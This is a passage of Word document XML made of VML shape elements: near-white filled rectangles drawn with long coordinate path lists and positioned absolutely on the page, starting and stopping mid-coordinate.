3026,4101,3026,4100,3026,4099,3026,4097,3026,4096,3026,4094,3026,4093,3026,4092,3026,4090,3026,4088,3026,4087,3026,4085,3026,4083,3026,4081,3026,4079,3026,4078,3026,4076,3026,4073,3026,4071,3026,4069,3026,4067,3026,4065,3026,4062,3026,4060,3026,4057,3026,4055,3026,4052,3026,4049,3026,4046,3026,4044,3026,4041,3026,4038,3026,4035,3026,4031,3026,4028,3026,4025,3026,4021,3026,4018,3026,4014,3026,4011,3026,4007,3026,4003,3026,3999,3026,3995,3026,3991,3026,3987,3026,3983,3026,3979,3026,3974,3026,3970,3026,3965,3026,3960,3026,3956,3026,3951,3026,3946,3026,3941,3026,3936,3026,3930,3026,3925,3026,3920,3026,3914,3026,3908,3026,3903,3026,3897,3026,3891,3026,3885,3026,3879,3026,3872,3026,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:211.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,4230" coordsize="130,250">
        <v:shape style="position:absolute;left:2650;top:4230;width:130;height:250" coordorigin="2650,4230" coordsize="130,250" path="m2665,4241l2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2665,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2666,4241,2667,4241,2667,4241,2667,4241,2667,4241,2667,4241,2667,4241,2668,4241,2668,4241,2668,4241,2668,4241,2669,4241,2669,4241,2669,4241,2670,4241,2670,4241,2670,4241,2671,4241,2671,4241,2671,4241,2672,4241,2672,4241,2673,4241,2673,4241,2674,4241,2674,4241,2675,4241,2675,4241,2676,4241,2677,4241,2677,4241,2678,4241,2679,4241,2679,4241,2680,4241,2681,4241,2682,4241,2682,4241,2683,4241,2684,4241,2685,4241,2686,4241,2687,4241,2688,4241,2689,4241,2690,4241,2691,4241,2692,4241,2693,4241,2694,4241,2695,4241,2697,4241,2698,4241,2699,4241,2700,4241,2702,4241,2703,4241,2705,4241,2706,4241,2708,4241,2709,4241,2711,4241,2712,4241,2714,4241,2716,4241,2717,4241,2719,4241,2721,4241,2723,4241,2725,4241,2726,4241,2728,4241,2730,4241,2732,4241,2734,4241,2737,4241,2739,4241,2741,4241,2743,4241,2745,4241,2748,4241,2750,4241,2753,4241,2755,4241,2758,4241,2760,4241,2763,4241,2765,4241,2768,4241,2771,4241,2774,4241,2777,4241,2779,4241,2782,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4241,2785,4242,2785,4242,2785,4242,2785,4242,2785,4242,2785,4242,2785,4242,2785,4243,2785,4243,2785,4243,2785,4243,2785,4244,2785,4244,2785,4244,2785,4244,2785,4245,2785,4245,2785,4246,2785,4246,2785,4247,2785,4247,2785,4248,2785,4248,2785,4249,2785,4249,2785,4250,2785,4251,2785,4252,2785,4252,2785,4253,2785,4254,2785,4255,2785,4256,2785,4257,2785,4258,2785,4259,2785,4260,2785,4261,2785,4262,2785,4264,2785,4265,2785,4266,2785,4268,2785,4269,2785,4271,2785,4272,2785,4274,2785,4276,2785,4277,2785,4279,2785,4281,2785,4283,2785,4285,2785,4287,2785,4289,2785,4291,2785,4293,2785,4295,2785,4298,2785,4300,2785,4302,2785,4305,2785,4308,2785,4310,2785,4313,2785,4316,2785,4319,2785,4322,2785,4325,2785,4328,2785,4331,2785,4334,2785,4337,2785,4341,2785,4344,2785,4348,2785,4352,2785,4355,2785,4359,2785,4363,2785,4367,2785,4371,2785,4375,2785,4379,2785,4384,2785,4388,2785,4393,2785,4397,2785,4402,2785,4407,2785,4411,2785,4416,2785,4421,2785,4427,2785,4432,2785,4437,2785,4443,2785,4448,2785,4454,2785,4460,2785,4465,2785,4471,2785,4477,2785,4484,2785,4490,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2785,4496,2784,4496,2784,4496,2784,4496,2784,4496,2784,4496,2784,4496,2783,4496,2783,4496,2783,4496,2783,4496,2783,4496,2782,4496,2782,4496,2782,4496,2781,4496,2781,4496,2781,4496,2780,4496,2780,4496,2780,4496,2779,4496,2779,4496,2778,4496,2778,4496,2778,4496,2777,4496,2776,4496,2776,4496,2775,4496,2775,4496,2774,4496,2774,4496,2773,4496,2772,4496,2772,4496,2771,4496,2770,4496,2769,4496,2768,4496,2768,4496,2767,4496,2766,4496,2765,4496,2764,4496,2763,4496,2762,4496,2761,4496,2760,4496,2759,4496,2758,4496,2757,4496,2755,4496,2754,4496,2753,4496,2752,4496,2750,4496,2749,4496,2748,4496,2746,4496,2745,4496,2743,4496,2742,4496,2740,4496,2738,4496,2737,4496,2735,4496,2733,4496,2732,4496,2730,4496,2728,4496,2726,4496,2724,4496,2722,4496,2720,4496,2718,4496,2716,4496,2714,4496,2712,4496,2710,4496,2708,4496,2705,4496,2703,4496,2701,4496,2698,4496,2696,4496,2693,4496,2691,4496,2688,4496,2685,4496,2683,4496,2680,4496,2677,4496,2674,4496,2671,4496,2668,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4496,2665,4495,2665,4495,2665,4495,2665,4495,2665,4495,2665,4494,2665,4494,2665,4494,2665,4494,2665,4493,2665,4493,2665,4493,2665,4492,2665,4492,2665,4491,2665,4491,2665,4490,2665,4490,2665,4489,2665,4489,2665,4488,2665,4487,2665,4487,2665,4486,2665,4485,2665,4484,2665,4483,2665,4482,2665,4482,2665,4481,2665,4480,2665,4478,2665,4477,2665,4476,2665,4475,2665,4474,2665,4472,2665,4471,2665,4470,2665,4468,2665,4467,2665,4465,2665,4464,2665,4462,2665,4460,2665,4458,2665,4457,2665,4455,2665,4453,2665,4451,2665,4449,2665,4447,2665,4444,2665,4442,2665,4440,2665,4437,2665,4435,2665,4432,2665,4430,2665,4427,2665,4424,2665,4422,2665,4419,2665,4416,2665,4413,2665,4410,2665,4407,2665,4403,2665,4400,2665,4397,2665,4393,2665,4390,2665,4386,2665,4382,2665,4378,2665,4374,2665,4371,2665,4366,2665,4362,2665,4358,2665,4354,2665,4349,2665,4345,2665,4340,2665,4336,2665,4331,2665,4326,2665,4321,2665,4316,2665,4311,2665,4306,2665,4300,2665,4295,2665,4289,2665,4284,2665,4278,2665,4272,2665,4266,2665,4260,2665,4254,2665,4248,2665,4241e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:211.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,4230" coordsize="130,250">
        <v:shape style="position:absolute;left:3010;top:4230;width:130;height:250" coordorigin="3010,4230" coordsize="130,250" path="m3026,4241l3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3026,4241,3027,4241,3027,4241,3027,4241,3027,4241,3027,4241,3027,4241,3027,4241,3028,4241,3028,4241,3028,4241,3028,4241,3029,4241,3029,4241,3029,4241,3029,4241,3030,4241,3030,4241,3030,4241,3031,4241,3031,4241,3032,4241,3032,4241,3032,4241,3033,4241,3033,4241,3034,4241,3034,4241,3035,4241,3036,4241,3036,4241,3037,4241,3037,4241,3038,4241,3039,4241,3039,4241,3040,4241,3041,4241,3042,4241,3043,4241,3043,4241,3044,4241,3045,4241,3046,4241,3047,4241,3048,4241,3049,4241,3050,4241,3051,4241,3052,4241,3053,4241,3054,4241,3056,4241,3057,4241,3058,4241,3059,4241,3061,4241,3062,4241,3063,4241,3065,4241,3066,4241,3068,4241,3069,4241,3071,4241,3072,4241,3074,4241,3076,4241,3077,4241,3079,4241,3081,4241,3083,4241,3085,4241,3087,4241,3089,4241,3091,4241,3093,4241,3095,4241,3097,4241,3099,4241,3101,4241,3103,4241,3106,4241,3108,4241,3110,4241,3113,4241,3115,4241,3118,4241,3120,4241,3123,4241,3126,4241,3128,4241,3131,4241,3134,4241,3137,4241,3140,4241,3143,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4241,3146,4242,3146,4242,3146,4242,3146,4242,3146,4242,3146,4242,3146,4242,3146,4243,3146,4243,3146,4243,3146,4243,3146,4244,3146,4244,3146,4244,3146,4244,3146,4245,3146,4245,3146,4246,3146,4246,3146,4247,3146,4247,3146,4248,3146,4248,3146,4249,3146,4249,3146,4250,3146,4251,3146,4252,3146,4252,3146,4253,3146,4254,3146,4255,3146,4256,3146,4257,3146,4258,3146,4259,3146,4260,3146,4261,3146,4262,3146,4264,3146,4265,3146,4266,3146,4268,3146,4269,3146,4271,3146,4272,3146,4274,3146,4276,3146,4277,3146,4279,3146,4281,3146,4283,3146,4285,3146,4287,3146,4289,3146,4291,3146,4293,3146,4295,3146,4298,3146,4300,3146,4302,3146,4305,3146,4308,3146,4310,3146,4313,3146,4316,3146,4319,3146,4322,3146,4325,3146,4328,3146,4331,3146,4334,3146,4337,3146,4341,3146,4344,3146,4348,3146,4352,3146,4355,3146,4359,3146,4363,3146,4367,3146,4371,3146,4375,3146,4379,3146,4384,3146,4388,3146,4393,3146,4397,3146,4402,3146,4407,3146,4411,3146,4416,3146,4421,3146,4427,3146,4432,3146,4437,3146,4443,3146,4448,3146,4454,3146,4460,3146,4465,3146,4471,3146,4477,3146,4484,3146,4490,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3144,4496,3144,4496,3144,4496,3144,4496,3144,4496,3144,4496,3143,4496,3143,4496,3143,4496,3143,4496,3143,4496,3142,4496,3142,4496,3142,4496,3141,4496,3141,4496,3141,4496,3140,4496,3140,4496,3140,4496,3139,4496,3139,4496,3138,4496,3138,4496,3137,4496,3137,4496,3136,4496,3136,4496,3135,4496,3134,4496,3134,4496,3133,4496,3132,4496,3132,4496,3131,4496,3130,4496,3129,4496,3129,4496,3128,4496,3127,4496,3126,4496,3125,4496,3124,4496,3123,4496,3122,4496,3121,4496,3120,4496,3119,4496,3118,4496,3117,4496,3116,4496,3114,4496,3113,4496,3112,4496,3110,4496,3109,4496,3108,4496,3106,4496,3105,4496,3103,4496,3102,4496,3100,4496,3099,4496,3097,4496,3095,4496,3094,4496,3092,4496,3090,4496,3088,4496,3086,4496,3084,4496,3083,4496,3081,4496,3079,4496,3076,4496,3074,4496,3072,4496,3070,4496,3068,4496,3065,4496,3063,4496,3061,4496,3058,4496,3056,4496,3053,4496,3051,4496,3048,4496,3045,4496,3043,4496,3040,4496,3037,4496,3034,4496,3031,4496,3029,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4495,3026,4495,3026,4495,3026,4495,3026,4495,3026,4494,3026,4494,3026,4494,3026,4494,3026,4493,3026,4493,3026,4493,3026,4492,3026,4492,3026,4491,3026,4491,3026,4490,3026,4490,3026,4489,3026,4489,3026,4488,3026,4487,3026,4487,3026,4486,3026,4485,3026,4484,3026,4483,3026,4482,3026,4482,3026,4481,3026,4480,3026,4478,3026,4477,3026,4476,3026,4475,3026,4474,3026,4472,3026,4471,3026,4470,3026,4468,3026,4467,3026,4465,3026,4464,3026,4462,3026,4460,3026,4458,3026,4457,3026,4455,3026,4453,3026,4451,3026,4449,3026,4447,3026,4444,3026,4442,3026,4440,3026,4437,3026,4435,3026,4432,3026,4430,3026,4427,3026,4424,3026,4422,3026,4419,3026,4416,3026,4413,3026,4410,3026,4407,3026,4403,3026,4400,3026,4397,3026,4393,3026,4390,3026,4386,3026,4382,3026,4378,3026,4374,3026,4371,3026,4366,3026,4362,3026,4358,3026,4354,3026,4349,3026,4345,3026,4340,3026,4336,3026,4331,3026,4326,3026,4321,3026,4316,3026,4311,3026,4306,3026,4300,3026,4295,3026,4289,3026,4284,3026,4278,3026,4272,3026,4266,3026,4260,3026,4254,3026,4248,3026,4241e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:242.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,4850" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:4850;width:130;height:270" coordorigin="2650,4850" coordsize="130,270" path="m2665,4871l2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2667,4871,2667,4871,2667,4871,2667,4871,2667,4871,2667,4871,2668,4871,2668,4871,2668,4871,2668,4871,2669,4871,2669,4871,2669,4871,2670,4871,2670,4871,2670,4871,2671,4871,2671,4871,2671,4871,2672,4871,2672,4871,2673,4871,2673,4871,2674,4871,2674,4871,2675,4871,2675,4871,2676,4871,2677,4871,2677,4871,2678,4871,2679,4871,2679,4871,2680,4871,2681,4871,2682,4871,2682,4871,2683,4871,2684,4871,2685,4871,2686,4871,2687,4871,2688,4871,2689,4871,2690,4871,2691,4871,2692,4871,2693,4871,2694,4871,2695,4871,2697,4871,2698,4871,2699,4871,2700,4871,2702,4871,2703,4871,2705,4871,2706,4871,2708,4871,2709,4871,2711,4871,2712,4871,2714,4871,2716,4871,2717,4871,2719,4871,2721,4871,2723,4871,2725,4871,2726,4871,2728,4871,2730,4871,2732,4871,2734,4871,2737,4871,2739,4871,2741,4871,2743,4871,2745,4871,2748,4871,2750,4871,2753,4871,2755,4871,2758,4871,2760,4871,2763,4871,2765,4871,2768,4871,2771,4871,2774,4871,2777,4871,2779,4871,2782,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4873,2785,4873,2785,4873,2785,4873,2785,4874,2785,4874,2785,4874,2785,4874,2785,4875,2785,4875,2785,4876,2785,4876,2785,4876,2785,4877,2785,4877,2785,4878,2785,4879,2785,4879,2785,4880,2785,4880,2785,4881,2785,4882,2785,4883,2785,4883,2785,4884,2785,4885,2785,4886,2785,4887,2785,4888,2785,4889,2785,4890,2785,4892,2785,4893,2785,4894,2785,4895,2785,4897,2785,4898,2785,4899,2785,4901,2785,4903,2785,4904,2785,4906,2785,4908,2785,4909,2785,4911,2785,4913,2785,4915,2785,4917,2785,4919,2785,4921,2785,4923,2785,4926,2785,4928,2785,4930,2785,4933,2785,4935,2785,4938,2785,4941,2785,4943,2785,4946,2785,4949,2785,4952,2785,4955,2785,4958,2785,4961,2785,4964,2785,4968,2785,4971,2785,4975,2785,4978,2785,4982,2785,4986,2785,4989,2785,4993,2785,4997,2785,5001,2785,5005,2785,5010,2785,5014,2785,5018,2785,5023,2785,5027,2785,5032,2785,5037,2785,5042,2785,5047,2785,5052,2785,5057,2785,5062,2785,5068,2785,5073,2785,5079,2785,5084,2785,5090,2785,5096,2785,5102,2785,5108,2785,5114,2785,5120,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2784,5127,2784,5127,2784,5127,2784,5127,2784,5127,2784,5127,2783,5127,2783,5127,2783,5127,2783,5127,2783,5127,2782,5127,2782,5127,2782,5127,2781,5127,2781,5127,2781,5127,2780,5127,2780,5127,2780,5127,2779,5127,2779,5127,2778,5127,2778,5127,2778,5127,2777,5127,2776,5127,2776,5127,2775,5127,2775,5127,2774,5127,2774,5127,2773,5127,2772,5127,2772,5127,2771,5127,2770,5127,2769,5127,2768,5127,2768,5127,2767,5127,2766,5127,2765,5127,2764,5127,2763,5127,2762,5127,2761,5127,2760,5127,2759,5127,2758,5127,2757,5127,2755,5127,2754,5127,2753,5127,2752,5127,2750,5127,2749,5127,2748,5127,2746,5127,2745,5127,2743,5127,2742,5127,2740,5127,2738,5127,2737,5127,2735,5127,2733,5127,2732,5127,2730,5127,2728,5127,2726,5127,2724,5127,2722,5127,2720,5127,2718,5127,2716,5127,2714,5127,2712,5127,2710,5127,2708,5127,2705,5127,2703,5127,2701,5127,2698,5127,2696,5127,2693,5127,2691,5127,2688,5127,2685,5127,2683,5127,2680,5127,2677,5127,2674,5127,2671,5127,2668,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5125,2665,5125,2665,5125,2665,5125,2665,5124,2665,5124,2665,5124,2665,5124,2665,5123,2665,5123,2665,5122,2665,5122,2665,5122,2665,5121,2665,5121,2665,5120,2665,5120,2665,5119,2665,5118,2665,5118,2665,5117,2665,5116,2665,5115,2665,5115,2665,5114,2665,5113,2665,5112,2665,5111,2665,5110,2665,5109,2665,5108,2665,5107,2665,5105,2665,5104,2665,5103,2665,5101,2665,5100,2665,5099,2665,5097,2665,5095,2665,5094,2665,5092,2665,5091,2665,5089,2665,5087,2665,5085,2665,5083,2665,5081,2665,5079,2665,5077,2665,5075,2665,5072,2665,5070,2665,5068,2665,5065,2665,5063,2665,5060,2665,5057,2665,5055,2665,5052,2665,5049,2665,5046,2665,5043,2665,5040,2665,5037,2665,5034,2665,5030,2665,5027,2665,5023,2665,5020,2665,5016,2665,5012,2665,5009,2665,5005,2665,5001,2665,4997,2665,4993,2665,4988,2665,4984,2665,4980,2665,4975,2665,4971,2665,4966,2665,4961,2665,4956,2665,4951,2665,4946,2665,4941,2665,4936,2665,4931,2665,4925,2665,4920,2665,4914,2665,4908,2665,4902,2665,4896,2665,4890,2665,4884,2665,4878,2665,4871e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:242.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,4850" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:4850;width:130;height:270" coordorigin="3010,4850" coordsize="130,270" path="m3026,4871l3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3027,4871,3027,4871,3027,4871,3027,4871,3027,4871,3027,4871,3027,4871,3028,4871,3028,4871,3028,4871,3028,4871,3029,4871,3029,4871,3029,4871,3029,4871,3030,4871,3030,4871,3030,4871,3031,4871,3031,4871,3032,4871,3032,4871,3032,4871,3033,4871,3033,4871,3034,4871,3034,4871,3035,4871,3036,4871,3036,4871,3037,4871,3037,4871,3038,4871,3039,4871,3039,4871,3040,4871,3041,4871,3042,4871,3043,4871,3043,4871,3044,4871,3045,4871,3046,4871,3047,4871,3048,4871,3049,4871,3050,4871,3051,4871,3052,4871,3053,4871,3054,4871,3056,4871,3057,4871,3058,4871,3059,4871,3061,4871,3062,4871,3063,4871,3065,4871,3066,4871,3068,4871,3069,4871,3071,4871,3072,4871,3074,4871,3076,4871,3077,4871,3079,4871,3081,4871,3083,4871,3085,4871,3087,4871,3089,4871,3091,4871,3093,4871,3095,4871,3097,4871,3099,4871,3101,4871,3103,4871,3106,4871,3108,4871,3110,4871,3113,4871,3115,4871,3118,4871,3120,4871,3123,4871,3126,4871,3128,4871,3131,4871,3134,4871,3137,4871,3140,4871,3143,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4873,3146,4873,3146,4873,3146,4873,3146,4874,3146,4874,3146,4874,3146,4874,3146,4875,3146,4875,3146,4876,3146,4876,3146,4876,3146,4877,3146,4877,3146,4878,3146,4879,3146,4879,3146,4880,3146,4880,3146,4881,3146,4882,3146,4883,3146,4883,3146,4884,3146,4885,3146,4886,3146,4887,3146,4888,3146,4889,3146,4890,3146,4892,3146,4893,3146,4894,3146,4895,3146,4897,3146,4898,3146,4899,3146,4901,3146,4903,3146,4904,3146,4906,3146,4908,3146,4909,3146,4911,3146,4913,3146,4915,3146,4917,3146,4919,3146,4921,3146,4923,3146,4926,3146,4928,3146,4930,3146,4933,3146,4935,3146,4938,3146,4941,3146,4943,3146,4946,3146,4949,3146,4952,3146,4955,3146,4958,3146,4961,3146,4964,3146,4968,3146,4971,3146,4975,3146,4978,3146,4982,3146,4986,3146,4989,3146,4993,3146,4997,3146,5001,3146,5005,3146,5010,3146,5014,3146,5018,3146,5023,3146,5027,3146,5032,3146,5037,3146,5042,3146,5047,3146,5052,3146,5057,3146,5062,3146,5068,3146,5073,3146,5079,3146,5084,3146,5090,3146,5096,3146,5102,3146,5108,3146,5114,3146,5120,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3144,5127,3144,5127,3144,5127,3144,5127,3144,5127,3144,5127,3143,5127,3143,5127,3143,5127,3143,5127,3143,5127,3142,5127,3142,5127,3142,5127,3141,5127,3141,5127,3141,5127,3140,5127,3140,5127,3140,5127,3139,5127,3139,5127,3138,5127,3138,5127,3137,5127,3137,5127,3136,5127,3136,5127,3135,5127,3134,5127,3134,5127,3133,5127,3132,5127,3132,5127,3131,5127,3130,5127,3129,5127,3129,5127,3128,5127,3127,5127,3126,5127,3125,5127,3124,5127,3123,5127,3122,5127,3121,5127,3120,5127,3119,5127,3118,5127,3117,5127,3116,5127,3114,5127,3113,5127,3112,5127,3110,5127,3109,5127,3108,5127,3106,5127,3105,5127,3103,5127,3102,5127,3100,5127,3099,5127,3097,5127,3095,5127,3094,5127,3092,5127,3090,5127,3088,5127,3086,5127,3084,5127,3083,5127,3081,5127,3079,5127,3076,5127,3074,5127,3072,5127,3070,5127,3068,5127,3065,5127,3063,5127,3061,5127,3058,5127,3056,5127,3053,5127,3051,5127,3048,5127,3045,5127,3043,5127,3040,5127,3037,5127,3034,5127,3031,5127,3029,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5125,3026,5125,3026,5125,3026,5125,3026,5124,3026,5124,3026,5124,3026,5124,3026,5123,3026,5123,3026,5122,3026,5122,3026,5122,3026,5121,3026,5121,3026,5120,3026,5120,3026,5119,3026,5118,3026,5118,3026,5117,3026,5116,3026,5115,3026,5115,3026,5114,3026,5113,3026,5112,3026,5111,3026,5110,3026,5109,3026,5108,3026,5107,3026,5105,3026,5104,3026,5103,3026,5101,3026,5100,3026,5099,3026,5097,3026,5095,3026,5094,3026,5092,3026,5091,3026,5089,3026,5087,3026,5085,3026,5083,3026,5081,3026,5079,3026,5077,3026,5075,3026,5072,3026,5070,3026,5068,3026,5065,3026,5063,3026,5060,3026,5057,3026,5055,3026,5052,3026,5049,3026,5046,3026,5043,3026,5040,3026,5037,3026,5034,3026,5030,3026,5027,3026,5023,3026,5020,3026,5016,3026,5012,3026,5009,3026,5005,3026,5001,3026,4997,3026,4993,3026,4988,3026,4984,3026,4980,3026,4975,3026,4971,3026,4966,3026,4961,3026,4956,3026,4951,3026,4946,3026,4941,3026,4936,3026,4931,3026,4925,3026,4920,3026,4914,3026,4908,3026,4902,3026,4896,3026,4890,3026,4884,3026,4878,3026,4871e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:274.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,5490" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:5490;width:130;height:270" coordorigin="2650,5490" coordsize="130,270" path="m2665,5517l2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2667,5517,2667,5517,2667,5517,2667,5517,2667,5517,2667,5517,2668,5517,2668,5517,2668,5517,2668,5517,2669,5517,2669,5517,2669,5517,2670,5517,2670,5517,2670,5517,2671,5517,2671,5517,2671,5517,2672,5517,2672,5517,2673,5517,2673,5517,2674,5517,2674,5517,2675,5517,2675,5517,2676,5517,2677,5517,2677,5517,2678,5517,2679,5517,2679,5517,2680,5517,2681,5517,2682,5517,2682,5517,2683,5517,2684,5517,2685,5517,2686,5517,2687,5517,2688,5517,2689,5517,2690,5517,2691,5517,2692,5517,2693,5517,2694,5517,2695,5517,2697,5517,2698,5517,2699,5517,2700,5517,2702,5517,2703,5517,2705,5517,2706,5517,2708,5517,2709,5517,2711,5517,2712,5517,2714,5517,2716,5517,2717,5517,2719,5517,2721,5517,2723,5517,2725,5517,2726,5517,2728,5517,2730,5517,2732,5517,2734,5517,2737,5517,2739,5517,2741,5517,2743,5517,2745,5517,2748,5517,2750,5517,2753,5517,2755,5517,2758,5517,2760,5517,2763,5517,2765,5517,2768,5517,2771,5517,2774,5517,2777,5517,2779,5517,2782,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5518,2785,5518,2785,5518,2785,5518,2785,5518,2785,5518,2785,5519,2785,5519,2785,5519,2785,5519,2785,5520,2785,5520,2785,5520,2785,5521,2785,5521,2785,5522,2785,5522,2785,5523,2785,5523,2785,5524,2785,5524,2785,5525,2785,5526,2785,5526,2785,5527,2785,5528,2785,5529,2785,5530,2785,5531,2785,5532,2785,5532,2785,5534,2785,5535,2785,5536,2785,5537,2785,5538,2785,5539,2785,5541,2785,5542,2785,5543,2785,5545,2785,5546,2785,5548,2785,5549,2785,5551,2785,5553,2785,5555,2785,5556,2785,5558,2785,5560,2785,5562,2785,5564,2785,5567,2785,5569,2785,5571,2785,5573,2785,5576,2785,5578,2785,5581,2785,5583,2785,5586,2785,5589,2785,5591,2785,5594,2785,5597,2785,5600,2785,5603,2785,5607,2785,5610,2785,5613,2785,5616,2785,5620,2785,5624,2785,5627,2785,5631,2785,5635,2785,5639,2785,5643,2785,5647,2785,5651,2785,5655,2785,5659,2785,5664,2785,5668,2785,5673,2785,5677,2785,5682,2785,5687,2785,5692,2785,5697,2785,5702,2785,5707,2785,5713,2785,5718,2785,5724,2785,5729,2785,5735,2785,5741,2785,5747,2785,5753,2785,5759,2785,5766,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2784,5772,2784,5772,2784,5772,2784,5772,2784,5772,2784,5772,2783,5772,2783,5772,2783,5772,2783,5772,2783,5772,2782,5772,2782,5772,2782,5772,2781,5772,2781,5772,2781,5772,2780,5772,2780,5772,2780,5772,2779,5772,2779,5772,2778,5772,2778,5772,2778,5772,2777,5772,2776,5772,2776,5772,2775,5772,2775,5772,2774,5772,2774,5772,2773,5772,2772,5772,2772,5772,2771,5772,2770,5772,2769,5772,2768,5772,2768,5772,2767,5772,2766,5772,2765,5772,2764,5772,2763,5772,2762,5772,2761,5772,2760,5772,2759,5